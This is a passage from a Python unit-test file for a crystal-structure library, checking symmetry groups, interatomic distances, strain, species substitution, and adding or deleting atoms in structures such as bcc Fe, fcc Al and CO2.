            "FeFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=np.identity(3)
        )
        basis.plot3d(mode='plotly')
    def test_group_points_by_symmetry(self):
        """Symmetry-equivalent points collapse into one group; inequivalent ones do not."""
        basis = Atoms("FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3))
        self.assertEqual(len(basis.group_points_by_symmetry([3 * [0.5], 3 * [1.5]])), 1)
        self.assertEqual(len(basis.group_points_by_symmetry([3 * [0.5], 3 * [1.4]])), 2)
    def test_get_equivalent_voronoi_vertices(self):
        """bcc has one symmetry-equivalent class of Voronoi vertices, all well away from the atoms."""
        basis = Atoms("FeFe", positions=[3 * [0], 3 * [1]], cell=2 * np.eye(3), pbc=True)
        vert = basis.get_equivalent_voronoi_vertices()
        self.assertEqual(len(vert), 1)
        self.assertGreater(
            np.min(np.linalg.norm(vert[0] - basis.positions[0], axis=-1)), 0.5
        )
        self.assertGreater(
            np.min(np.linalg.norm(vert[0] - basis.positions[1], axis=-1)), 0.5
        )
    def test_find_mic(self):
        """find_mic matches the reference minimum-image computation
        (fractional coords wrapped by rint) and preserves input shape."""
        cell = 0.1*(np.random.random((3,3))-0.5)+np.eye(3)
        basis = Atoms("Fe", positions=[3*[0.5]], cell=cell, pbc=True)
        v = 2*np.random.random(3)-1
        # Reference: wrap v into the cell in fractional space, then map back
        r = np.linalg.inv(cell.T).dot(v)
        r -= np.rint(r)
        self.assertTrue(np.isclose(
            r[0]*cell[0]+r[1]*cell[1]+r[2]*cell[2],
            basis.find_mic(v, vectors=True)
        ).all())
        # Output shape mirrors input shape for 1D, 2D and 3D inputs
        for v in [np.ones(3), np.ones((3,3)), np.ones((3,3,3))]:
            self.assertTrue(np.array_equal(basis.find_mic(v).shape, v.shape))
    def test_get_distances_array(self):
        """Pairwise distance matrix: non-mic distances, p1/p2 symmetry, and mic vectors."""
        basis = Atoms("FeFe", positions=[3*[0], 3*[0.9]], cell=np.identity(3), pbc=True)
        self.assertAlmostEqual(basis.get_distances_array(mic=False)[0, 1], 0.9*np.sqrt(3))
        self.assertTrue(np.allclose(basis.get_distances_array(p1=0.5*np.ones(3)),
                                    basis.get_distances_array(p2=0.5*np.ones(3))))
        # With mic, the vector from atom 0 to atom 1 wraps to -0.1 per axis
        self.assertTrue(np.allclose(basis.get_distances_array(vectors=True)[0, 1], -0.1*np.ones(3)))
    def test_repeat_points(self):
        """repeat_points tiles arbitrary points over cell translations
        (including a sheared cell) and validates input shapes."""
        basis = Atoms("Fe", positions=np.random.rand(3).reshape(-1, 3), cell=np.identity(3))
        # Shear the cell slightly so translations are not axis-aligned
        basis.cell[0, 1] = 0.01
        with self.assertRaises(ValueError):
            basis.repeat_points([0, 0, 0], [2 ,2])
        with self.assertRaises(ValueError):
            basis.repeat_points([0, 0], 2)
        v = np.random.rand(3)
        w = basis.repeat_points(v, 3)
        # The image of v translated by cell vector a0 = [1, 0.01, 0] must be present
        v += np.array([1, 0.01, 0])
        self.assertAlmostEqual(np.linalg.norm(w-v, axis=-1).min(), 0)
        # Two points repeated 2x2x2 -> shape (8, 2, 3)
        v = np.random.rand(6).reshape(-1, 3)
        self.assertEqual(basis.repeat_points(v, 2).shape, (8, 2, 3))
    def test_get_extended_positions(self):
        """Negative extension width raises; zero width returns the positions unchanged."""
        basis = Atoms("FeFe", positions=[[0.01, 0, 0], [0.5, 0.5, 0.5]], cell=np.identity(3), pbc=True)
        with self.assertRaises(ValueError):
            basis.get_extended_positions(-0.1)
        self.assertTrue(np.array_equal(basis.get_extended_positions(0), basis.positions))
    def test_get_equivalent_points(self):
        """Symmetry images of a point include the expected equivalent position."""
        basis = Atoms("FeFe", positions=[[0.01, 0, 0], [0.5, 0.5, 0.5]], cell=np.identity(3))
        arr = basis.get_equivalent_points([0, 0, 0.5])
        self.assertAlmostEqual(np.linalg.norm(arr-np.array([0.51, 0.5, 0]), axis=-1).min(), 0)
    def test_cluster_analysis(self):
        """Adjacent atoms form one cluster of size 2; distant atoms stay separate."""
        basis = CrystalStructure("Al", bravais_basis="fcc", lattice_constants=4.2).repeat(10)
        key, counts = basis.cluster_analysis(id_list=[0,1], return_cluster_sizes=True)
        self.assertTrue(np.array_equal(key[1], [0,1]))
        self.assertEqual(counts[0], 2)
        # Atoms far apart: cluster 1 contains only atom 0
        key, counts = basis.cluster_analysis(id_list=[0,int(len(basis)/2)], return_cluster_sizes=True)
        self.assertTrue(np.array_equal(key[1], [0]))
        self.assertEqual(counts[0], 1)
    def test_get_bonds(self):
        """get_bonds for atom 0 lists exactly its first-shell neighbor indices."""
        basis = CrystalStructure("Al", bravais_basis="fcc", lattice_constants=4.2).repeat(5)
        bonds = basis.get_bonds()
        neigh = basis.get_neighbors()
        self.assertTrue(np.array_equal(np.sort(bonds[0]['Al'][0]),
                                       np.sort(neigh.indices[0, neigh.shells[0]==1])))
    # NOTE(review): truncated name (likely meant test_symmetrize_vectors) — kept
    # to avoid colliding with test_get_symmetry below; consider renaming.
    def test_get_symmetr(self):
        """symmetrize_vectors validates input shape, cancels vectors in a fully
        symmetric cell, and respects force_update after breaking symmetry."""
        cell = 2.2 * np.identity(3)
        Al = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        with self.assertRaises(ValueError):
            Al.symmetrize_vectors(1)
        v = np.random.rand(6).reshape(-1, 3)
        # Full bcc symmetry: symmetrized random vectors average to zero
        self.assertAlmostEqual(np.linalg.norm(Al.symmetrize_vectors(v)), 0)
        # Breaking symmetry along x leaves only the x components after update
        Al.positions[0,0] += 0.01
        w = Al.symmetrize_vectors(v, force_update=True)
        self.assertAlmostEqual(np.absolute(w[:,0]).sum(), np.linalg.norm(w, axis=-1).sum())
    def test_get_symmetry(self):
        """Symmetry dataset of a repeated bcc Al cell: one equivalent-atom class,
        96 operations, rotations and translations in lockstep."""
        cell = 2.2 * np.identity(3)
        Al = Atoms("AlAl", positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell).repeat(2)
        self.assertEqual(len(set(Al.get_symmetry()["equivalent_atoms"])), 1)
        self.assertEqual(len(Al.get_symmetry()["translations"]), 96)
        self.assertEqual(
            len(Al.get_symmetry()["translations"]), len(Al.get_symmetry()["rotations"])
        )
    def test_get_voronoi_vertices(self):
        """Internal Voronoi-vertex helper returns the expected vertex count for bcc."""
        cell = 2.2 * np.identity(3)
        Al = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell, pbc=True)
        pos, box = Al._get_voronoi_vertices()
        self.assertEqual(len(pos), 14)
    def test_get_parent_symbols(self):
        """Parent symbols equal chemical symbols for plain elements but differ
        for user-defined species such as O_up."""
        self.assertTrue(np.array_equal(self.CO2.get_parent_symbols(), ["C", "O", "O"]))
        self.assertTrue(
            np.array_equal(
                self.CO2.get_parent_symbols(), self.CO2.get_chemical_symbols()
            )
        )
        cell = np.eye(3) * 10.0
        pse = PeriodicTable()
        pse.add_element("O", "O_up", spin="up")
        o_up = pse.element("O_up")
        basis = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
        self.assertTrue(np.array_equal(basis.get_parent_symbols(), ["O"]))
        self.assertFalse(
            np.array_equal(basis.get_parent_symbols(), basis.get_chemical_symbols())
        )
    def test_get_chemical_symbols(self):
        """Chemical symbols report the species name, including user-defined ones (O_up)."""
        self.assertTrue(
            np.array_equal(self.CO2.get_chemical_symbols(), ["C", "O", "O"])
        )
        cell = np.eye(3) * 10.0
        pse = PeriodicTable()
        pse.add_element("O", "O_up", spin="up")
        o_up = pse.element("O_up")
        basis = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
        self.assertTrue(np.array_equal(basis.get_chemical_symbols(), ["O_up"]))
    def test_get_symmetry_dataset(self):
        """Spglib-style symmetry dataset identifies repeated bcc as space group 229 (Im-3m)."""
        cell = 2.2 * np.identity(3)
        Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        Al_sc.set_repeat([2, 2, 2])
        self.assertEqual(Al_sc.get_symmetry_dataset()["number"], 229)
    def test_get_space_group(self):
        """Space-group detection for bcc (229), fcc (225) and two hcp setups (194)."""
        cell = 2.2 * np.identity(3)
        Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        self.assertEqual(Al_sc.get_spacegroup()["InternationalTableSymbol"], "Im-3m")
        self.assertEqual(Al_sc.get_spacegroup()["Number"], 229)
        cell = 4.2 * (0.5 * np.ones((3, 3)) - 0.5 * np.eye(3))
        Al_fcc = Atoms("Al", scaled_positions=[(0, 0, 0)], cell=cell)
        self.assertEqual(Al_fcc.get_spacegroup()["InternationalTableSymbol"], "Fm-3m")
        self.assertEqual(Al_fcc.get_spacegroup()["Number"], 225)
        # hcp in the primitive (rhombic) setting
        a = 3.18
        c = 1.623 * a
        cell = np.eye(3)
        cell[0, 0] = a
        cell[2, 2] = c
        cell[1, 0] = -a / 2.0
        cell[1, 1] = np.sqrt(3) * a / 2.0
        pos = np.array([[0.0, 0.0, 0.0], [1.0 / 3.0, 2.0 / 3.0, 1.0 / 2.0]])
        Mg_hcp = Atoms("Mg2", scaled_positions=pos, cell=cell)
        self.assertEqual(Mg_hcp.get_spacegroup()["Number"], 194)
        # hcp in the orthorhombic (4-atom) setting gives the same space group
        cell = np.eye(3)
        cell[0, 0] = a
        cell[2, 2] = c
        cell[1, 1] = np.sqrt(3) * a
        pos = np.array(
            [
                [0.0, 0.0, 0.0],
                [0.5, 0.5, 0.0],
                [0.5, 0.16666667, 0.5],
                [0.0, 0.66666667, 0.5],
            ]
        )
        Mg_hcp = Atoms("Mg4", scaled_positions=pos, cell=cell)
        self.assertEqual(Mg_hcp.get_spacegroup()["Number"], 194)
    def test_get_primitive_cell(self):
        """Primitive cell of a repeated CsCl-type AlFe structure has space group 221 (Pm-3m)."""
        cell = 2.2 * np.identity(3)
        Al_sc = Atoms("AlFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        Al_sc.set_repeat([2, 2, 2])
        primitive_cell = Al_sc.get_primitive_cell()
        self.assertEqual(primitive_cell.get_spacegroup()["Number"], 221)
    def test_get_ir_reciprocal_mesh(self):
        """A 3x3x3 reciprocal mesh has 27 k-points in total."""
        cell = 2.2 * np.identity(3)
        Al_sc = Atoms("AlAl", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        self.assertEqual(len(Al_sc.get_ir_reciprocal_mesh([3, 3, 3])[0]), 27)
    def test_get_number_species_atoms(self):
        """Per-species atom counts for CO2 are 1 C and 2 O."""
        self.assertEqual(list(self.CO2.get_number_species_atoms().values()), [1, 2])
    def test_get_chemical_formula(self):
        """Chemical formula string of the CO2 fixture."""
        self.assertEqual(self.CO2.get_chemical_formula(), "CO2")
    def test_get_equivalent_atoms(self):
        """Smoke test: structure construction and repetition do not raise."""
        # NOTE(review): despite the name, no equivalent-atoms call or assertion is
        # made here — this test only verifies setup does not raise; consider
        # adding an assertion on get_symmetry()["equivalent_atoms"].
        cell = 2.2 * np.identity(3)
        Al_sc = Atoms("AlFe", scaled_positions=[(0, 0, 0), (0.5, 0.5, 0.5)], cell=cell)
        Al_sc.set_repeat([2, 2, 2])
    def test_center(self):
        """center(vacuum=5) translates all positions by the vacuum padding."""
        old_pos = self.CO2.positions.copy()
        self.CO2.center(vacuum=5)
        new_array = old_pos + 5 * np.ones(3)
        self.assertTrue(np.array_equal(self.CO2.positions, new_array))
    def test_get_positions(self):
        """get_positions returns the same data as the positions attribute."""
        basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constants=4.2)
        self.assertTrue(np.array_equal(basis_Mg.positions, basis_Mg.get_positions()))
    def test_get_scaled_positions(self):
        """Scaled positions equal inv(cell).T @ positions, even for a perturbed cell."""
        basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constants=4.2)
        basis_Mg.set_cell(basis_Mg.cell+0.1 * np.random.random((3, 3)))
        basis_Mg = basis_Mg.center_coordinates_in_unit_cell()
        self.assertTrue(
            np.allclose(
                np.dot(np.linalg.inv(basis_Mg.cell).T, basis_Mg.positions.T).T,
                basis_Mg.get_scaled_positions(),
            )
        )
    def test_apply_strain(self):
        """apply_strain: invalid strain raises; return_box leaves the original
        untouched; scalar and tensor strains scale cell and positions."""
        basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
        # Strain <= -1 would invert/collapse the cell
        with self.assertRaises(ValueError):
            basis_Fe.apply_strain(-2)
        basis_new = basis_Fe.apply_strain(0.01, return_box=True)
        self.assertAlmostEqual(basis_new.cell[0,0], 2.85*1.01)
        self.assertAlmostEqual(basis_new.positions[1,0], 0.5*2.85*1.01)
        # return_box=True must not modify the original structure
        self.assertAlmostEqual(basis_Fe.cell[0, 0], 2.85)
        basis_Fe.apply_strain(0.01)
        self.assertAlmostEqual(basis_Fe.cell[0,0], 2.85*1.01)
        # Strain may also be given as a 3x3 tensor
        basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
        basis_Fe.apply_strain(0.01*np.eye(3))
        self.assertAlmostEqual(basis_Fe.cell[0,0], 2.85*1.01)
    def test_get_spherical_coordinates(self):
        """Spherical coordinates relative to an explicit origin or the default center."""
        basis_Fe = CrystalStructure("Fe", bravais_basis="bcc", lattice_constants=2.85)
        x = basis_Fe.get_spherical_coordinates([0, 0, 0])
        self.assertAlmostEqual(x[0, 0], 0)
        x = basis_Fe.get_spherical_coordinates()
        # Body-center atom of bcc sits at azimuthal angle pi/4
        self.assertAlmostEqual(x[1, 2], 0.25*np.pi)
    def test_occupy_lattice(self):
        """occupy_lattice swaps species on given sites while preserving the site indices,
        and also accepts a single index."""
        basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
        basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
        basis_O.set_scaled_positions(basis_O.get_scaled_positions() + [0.0, 0.0, 0.5])
        basis = basis_Mg + basis_O
        basis.center_coordinates_in_unit_cell()
        orig_basis = basis.copy()
        self.assertEqual(basis.get_chemical_formula(), "Mg4O4")
        Mg_indices = basis.select_index("Mg")
        O_indices = basis.select_index("O")
        basis.occupy_lattice(Na=Mg_indices)
        self.assertEqual(basis.get_chemical_formula(), "Na4O4")
        basis.occupy_lattice(Cl=O_indices)
        self.assertEqual(basis.get_chemical_formula(), "Cl4Na4")
        # Site indices are preserved through the substitutions
        self.assertTrue(np.array_equal(basis.select_index("Na"), Mg_indices))
        self.assertTrue(np.array_equal(basis.select_index("Cl"), O_indices))
        orig_basis.set_repeat([2, 2, 2])
        Mg_indices = orig_basis.select_index("Mg")
        O_indices = orig_basis.select_index("O")
        orig_basis.occupy_lattice(Cl=O_indices, Na=Mg_indices)
        self.assertEqual(orig_basis.get_chemical_formula(), "Cl32Na32")
        # A single (scalar) index is also accepted
        orig_basis.occupy_lattice(H=O_indices[0])
        self.assertEqual(orig_basis.get_chemical_formula(), "Cl31HNa32")
    def test_get_majority_species(self):
        """Majority species is reported with its count; a tie emits a warning."""
        basis = Atoms(
            symbols=4 * ["Fe"], positions=np.random.random((4, 3)), cell=np.eye(3)
        )
        self.assertEqual(basis.get_majority_species()["count"], 4)
        self.assertEqual(basis.get_majority_species()["symbol"], "Fe")
        # Four different species with one atom each -> ambiguous majority
        basis = Atoms(
            symbols=["Fe", "Cu", "Ni", "Al"],
            positions=np.random.random((4, 3)),
            cell=np.eye(3),
        )
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            basis.get_majority_species()
            self.assertEqual(len(w), 1)
    def test_select_index(self):
        """select_index accepts symbol strings, lists of symbols, element objects,
        and user-defined species objects."""
        basis = Atoms(
            symbols=["Fe", "Cu", "Ni", "Al"],
            positions=np.random.random((4, 3)),
            cell=np.eye(3),
        )
        self.assertTrue(np.array_equal(basis.select_index("Fe"), [0]))
        self.assertTrue(np.array_equal(basis.select_index("Ni"), [2]))
        self.assertTrue(np.array_equal(basis.select_index(["Cu", "Al"]), [1, 3]))
        Fe = basis.convert_element("Fe")
        Ni = basis.convert_element("Ni")
        self.assertTrue(np.array_equal(basis.select_index([Fe, Ni]), [0, 2]))
        # Same queries with a user-defined spin-polarized Ni species
        pse = PeriodicTable()
        pse.add_element("Ni", "Ni_up", spin=1)
        ni_up = pse.element("Ni_up")
        basis = Atoms(
            symbols=["Fe", "Cu", ni_up, "Al"],
            positions=np.random.random((4, 3)),
            cell=np.eye(3),
        )
        self.assertTrue(np.array_equal(basis.select_index("Fe"), [0]))
        self.assertTrue(np.array_equal(basis.select_index(ni_up), [2]))
        self.assertTrue(np.array_equal(basis.select_index(["Cu", "Al"]), [1, 3]))
        Fe = basis.convert_element("Fe")
        Ni = basis.convert_element(ni_up)
        self.assertTrue(np.array_equal(basis.select_index([Fe, Ni]), [0, 2]))
    def test_parent_index(self):
        """After substituting O by a derived O_up species, select_parent_index("O")
        still finds the original O sites."""
        basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
        basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
        basis_O.positions += [0.0, 0.0, 0.5]
        basis = basis_Mg + basis_O
        basis.center_coordinates_in_unit_cell()
        basis.set_repeat([2, 2, 2])
        o_indices = basis.select_index("O")
        pse = PeriodicTable()
        pse.add_element("O", "O_up", spin="up")
        o_up = pse.element("O_up")
        basis[o_indices] = o_up
        self.assertTrue(np.array_equal(o_indices, basis.select_index(o_up)))
        # Plain "O" no longer matches, but the parent lookup does
        self.assertEqual(len(basis.select_index("O")), 0)
        self.assertTrue(np.array_equal(o_indices, basis.select_parent_index("O")))
    def test__eq__(self):
        """Equality: a copy equals the original (even after a no-op position change);
        different structures compare unequal."""
        test_basis = self.CO2.copy()
        self.assertEqual(test_basis, self.CO2)
        test_basis.positions[2] += 0.0
        self.assertEqual(test_basis, self.CO2)
        self.assertNotEqual(self.C2, self.CO2)
def test__add__(self):
    """Exercise Atoms.__add__/__iadd__: species merging, position
    book-keeping, tagged species, ASE interoperability and the warnings
    emitted on pbc/cell mismatches."""
    cell = np.eye(3) * 10.0
    basis_0 = Atoms(["O"], scaled_positions=[[0.5, 0.5, 0.5]], cell=cell)
    basis_1 = Atoms(["H"], scaled_positions=[[0.75, 0.75, 0.75]], cell=cell)
    basis_2 = Atoms(["H"], scaled_positions=[[0.25, 0.25, 0.25]], cell=cell)
    basis_3 = Atoms(
        ["H", "O", "N"],
        scaled_positions=[[0.35, 0.35, 0.35], [0.0, 0.0, 0.0], [0.0, 0.0, 0.1]],
        cell=cell,
    )
    pse = PeriodicTable()
    pse.add_element("O", "O_up", spin="up")
    o_up = pse.element("O_up")
    basis_4 = Atoms(
        [o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=np.eye(3) * 20.0
    )
    # chemical formulas accumulate across + and +=
    b = basis_0 + basis_1
    self.assertEqual(b.get_chemical_formula(), "HO")
    b = basis_0 + basis_1 + basis_2
    self.assertEqual(b.get_chemical_formula(), "H2O")
    b += basis_2
    self.assertEqual(b.get_chemical_formula(), "H3O")
    b = basis_0 + basis_1 + basis_2 + basis_3
    self.assertEqual(b.get_chemical_formula(), "H3NO2")
    # per-species scaled positions survive the merge unchanged
    self.assertTrue(
        np.array_equal(
            b.get_scaled_positions()[b.select_index("N")], [[0.0, 0.0, 0.1]]
        )
    )
    self.assertTrue(
        np.allclose(
            b.get_scaled_positions()[b.select_index("H")],
            [[0.75, 0.75, 0.75], [0.25, 0.25, 0.25], [0.35, 0.35, 0.35]],
        )
    )
    self.assertTrue(
        np.allclose(
            b.get_scaled_positions()[b.select_index("O")],
            [[0.5, 0.5, 0.5], [0.0, 0.0, 0.0]],
        )
    )
    b.set_repeat([2, 2, 2])
    self.assertEqual(b.get_chemical_formula(), "H24N8O16")
    # the tagged species O_up is tracked separately from plain O
    b += basis_4
    self.assertEqual(b.get_chemical_formula(), "H24N8O16O_up")
    self.assertTrue(
        np.allclose(
            b.get_scaled_positions()[b.select_index(o_up)], [[0.27, 0.27, 0.27]]
        )
    )
    # adding single Atom objects and self-addition keep species unique
    COX = self.C2 + Atom("O", position=[0, 0, -2])
    COX += Atom("O", position=[0, 0, -4])
    COX += COX
    n_objects = len(set(COX.get_species_objects()))
    n_species = len(set(COX.get_chemical_elements()))
    self.assertEqual(n_objects, n_species)
    self.assertEqual(n_objects, 2)
    self.assertEqual(n_species, 2)
    basis_Mg = CrystalStructure("Mg", bravais_basis="fcc", lattice_constant=4.2)
    basis_O = CrystalStructure("O", bravais_basis="fcc", lattice_constant=4.2)
    # basis_O.set_relative()
    basis_O.set_scaled_positions([0.0, 0.0, 0.5] + basis_O.get_scaled_positions())
    basis = basis_Mg + basis_O
    # tag lists of both operands are concatenated
    self.assertEqual(
        len(basis._tag_list), len(basis_Mg._tag_list) + len(basis_O._tag_list)
    )
    basis.center_coordinates_in_unit_cell()
    self.assertEqual(basis.get_spacegroup()["Number"], 225)
    # Adding an ASE instance to a pyiron instance
    ase_basis = ASEAtoms("O", scaled_positions=[[0, 0, 0]], cell=np.eye(3) * 10)
    pyiron_basis = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10)
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        pyiron_basis += ase_basis
        self.assertEqual(len(pyiron_basis), 2)
        self.assertEqual(len(ase_basis), 1)
        self.assertIsInstance(pyiron_basis, Atoms)
        # adding a pyiron instance to an ASE one keeps the ASE type
        ase_basis += pyiron_basis
        self.assertEqual(len(ase_basis), 3)
        self.assertIsInstance(ase_basis, ASEAtoms)
        self.assertNotIsInstance(ase_basis, Atoms)
        self.assertEqual(len(w), 1)
        pyiron_basis += ase_basis[0]
        self.assertEqual(len(pyiron_basis), 3)
    # mismatching pbc/cell settings must raise exactly one warning
    pyiron_basis = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10, pbc=True)
    larger_cell = pyiron_basis.repeat(2)
    larger_cell.positions += 2.5
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        larger_cell += pyiron_basis
        self.assertEqual(len(w), 1)
    basis_1 = Atoms("O", scaled_positions=[[0.5, 0.5, 0.5]], cell=np.eye(3) * 10)
    basis_2 = Atoms("O", scaled_positions=[[0., 0.5, 0.5]], cell=np.eye(3) * 10, pbc=True)
    with warnings.catch_warnings(record=True) as w:
        warnings.simplefilter("always")
        basis_1 += basis_2
        self.assertEqual(len(w), 1)
    # the right-hand operand of += must stay untouched
    a_0 = 2.86
    structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
    carbon = Atoms(symbols=['C'], positions=[[0, 0, 0.5 * a_0]])
    structure += carbon
    self.assertEqual(carbon.indices[0], 0)
def test_append(self):
    """append() is silent for a compatible Atoms argument but warns once
    after the appended structure is given its own cell."""
    a_0 = 2.86
    structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
    carbon = Atoms(symbols=['C'], positions=[[0, 0, 0.5 * a_0]], pbc=True)
    with warnings.catch_warnings(record=True) as w:
        # no warning for a cell-less, pbc-compatible atom
        structure.append(carbon)
        self.assertEqual(len(w), 0)
        structure = self.struct_factory.crystal('Fe', 'bcc', a_0)
        # giving `carbon` its own (mismatching) cell triggers a warning
        carbon.cell = np.random.rand(3)
        structure.append(carbon)
        self.assertEqual(len(w), 1)
def test__delitem__(self):
    """Deleting atoms (by single index or index array) keeps positions,
    tag lists and the species/index bookkeeping consistent; species with
    no remaining atoms are dropped and indices are re-compacted."""
    cell = np.eye(3) * 10.0
    basis_0 = Atoms(["O"], scaled_positions=[[0.5, 0.5, 0.5]], cell=cell)
    basis_1 = Atoms(["H"], scaled_positions=[[0.75, 0.75, 0.75]], cell=cell)
    basis_2 = Atoms(["H"], scaled_positions=[[0.25, 0.25, 0.25]], cell=cell)
    basis_3 = Atoms(
        ["H", "O", "N"],
        scaled_positions=[[0.35, 0.35, 0.35], [0.0, 0.0, 0.0], [0.0, 0.0, 0.1]],
        cell=cell,
    )
    pse = PeriodicTable()
    pse.add_element("O", "O_up", spin="up")
    o_up = pse.element("O_up")
    basis_4 = Atoms([o_up], scaled_positions=[[0.27, 0.27, 0.27]], cell=cell)
    b = basis_0 + basis_1 + basis_2 + basis_3 + basis_4
    O_indices = b.select_index("O")
    self.assertEqual(len(b), 7)
    self.assertEqual(len(b.indices), 7)
    self.assertEqual(len(b.species), 4)
    # delete a single O atom: species list is unchanged (one O remains)
    b.__delitem__(O_indices[0])
    self.assertEqual(b.get_chemical_formula(), "H3NOO_up")
    self.assertEqual(len(b), 6)
    self.assertEqual(len(b.indices), 6)
    self.assertEqual(len(b._tag_list), 6)
    self.assertEqual(len(b.species), 4)
    # delete the last O: the O species disappears, indices re-compact
    O_indices = b.select_index("O")
    b.__delitem__(O_indices)
    self.assertEqual(b.get_chemical_formula(), "H3NO_up")
    self.assertEqual(len(b), 5)
    self.assertEqual(len(b.indices), 5)
    self.assertEqual(len(b.species), 3)
    self.assertEqual(np.max(b.indices), 2)
    # same for N ...
    N_indices = b.select_index("N")
    b.__delitem__(N_indices)
    self.assertEqual(b.get_chemical_formula(), "H3O_up")
    self.assertEqual(len(b), 4)
    self.assertEqual(len(b.indices), 4)
    self.assertEqual(len(b.species), 2)
    self.assertEqual(np.max(b.indices), 1)
    # ... and for the tagged species O_up, leaving only H
    O_indices = b.select_index(o_up)
    b.__delitem__(O_indices)
    self.assertEqual(b.get_chemical_formula(), "H3")
    self.assertEqual(len(b), 3)
    self.assertEqual(len(b.indices), 3)
    self.assertEqual(len(b.species), 1)
    self.assertEqual(np.max(b.indices), 0)
def test__setitem__(self):
    """Assigning species through __setitem__ with scalar indices, numpy
    scalars, index lists/arrays and slices must keep the species list
    minimal (no orphaned species) and the chemical formula correct."""
    basis = self.CO2.copy()
    # scalar integer indices
    basis[0] = "H"
    basis[1] = "H"
    self.assertEqual(basis.get_chemical_formula(), "H2O")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    basis = self.CO2.copy()
    # assigning the same index twice (int and np.int64) is idempotent
    basis[0] = "H"
    basis[np.int64(0)] = "H"
    self.assertEqual(basis.get_chemical_formula(), "HO2")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    basis[0] = "O"
    self.assertEqual(basis.get_chemical_formula(), "O3")
    self.assertEqual(len(basis.species), 1)
    self.assertEqual(len(basis.get_species_symbols()), 1)
    basis = self.CO2.copy()
    # list-of-indices assignment
    basis[[2]] = "N"
    self.assertEqual(basis.get_chemical_formula(), "CNO")
    self.assertEqual(len(basis.species), 3)
    self.assertEqual(len(basis.get_species_symbols()), 3)
    basis = self.CO2.copy()
    basis[[0]] = "H"
    basis[np.array([0])] = "H"
    self.assertEqual(basis.get_chemical_formula(), "HO2")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    basis = self.CO2.copy()
    basis[[0]] = "N"
    self.assertEqual(basis.get_chemical_formula(), "NO2")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    basis[[0]] = "O"
    self.assertEqual(basis.get_chemical_formula(), "O3")
    self.assertEqual(len(basis.species), 1)
    self.assertEqual(len(basis.get_species_symbols()), 1)
    basis[[0, 2]] = "H"
    self.assertEqual(basis.get_chemical_formula(), "H2O")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    # assignment of a user-defined tagged species
    pse = PeriodicTable()
    pse.add_element("O", "O_up", spin="up")
    o_up = pse.element("O_up")
    basis[[0, 2]] = o_up
    self.assertEqual(basis.get_chemical_formula(), "OO_up2")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    # slice assignment: explicit, full, negative and strided slices
    basis[0:3] = "N"
    self.assertEqual(basis.get_chemical_formula(), "N3")
    self.assertEqual(len(basis.species), 1)
    self.assertEqual(len(basis.get_species_symbols()), 1)
    basis[:] = "Ne"
    self.assertEqual(basis.get_chemical_formula(), "Ne3")
    self.assertEqual(len(basis.species), 1)
    self.assertEqual(len(basis.get_species_symbols()), 1)
    basis[-2:] = "H"
    self.assertEqual(basis.get_chemical_formula(), "H2Ne")
    self.assertEqual(len(basis.species), 2)
    self.assertEqual(len(basis.get_species_symbols()), 2)
    basis[0:3] = "O"
    self.assertEqual(basis.get_chemical_formula(), "O3")
    self.assertEqual(len(basis.species), 1)
    self.assertEqual(len(basis.get_species_symbols()), 1)
    # larger, repeated structures
    lat_0 = CrystalStructure(
        "Al", bravais_basis="fcc", lattice_constant=4.0
    ).repeat(3)
    # lat_0.set_SQS(['Al', 'Mg'], x=1/4) # simple access to SQS
    lat_0[:] = "V"
    self.assertEqual(lat_0.get_chemical_formula(), "V108")
    lat_0[[1, 3, 5]] = "Mg"  # direct occupation
    self.assertEqual(lat_0.get_chemical_formula(), "Mg3V105")
    # lat_0[[0]] = 'V' # vacancy (note: do not delete atom)
    lat_1 = lat_0.copy()
    lat_1.set_scaled_positions(1 / 4 + lat_1.get_scaled_positions())
    lat_1[:] = "V"
    self.assertEqual(lat_1.get_chemical_formula(), "V108")
    lat_1[[1, 4, 9]] = "H"
    lat_1[[2, 5, 8]] = "C"
    self.assertEqual(lat_1.get_chemical_formula(), "C3H3V102")
    lat_1.set_scaled_positions(1 / 4 + lat_1.get_scaled_positions())
    lat_1[:] = "V"  # vacancies
    self.assertEqual(lat_1.get_chemical_formula(), "V108")
    # negative and mixed slice bounds
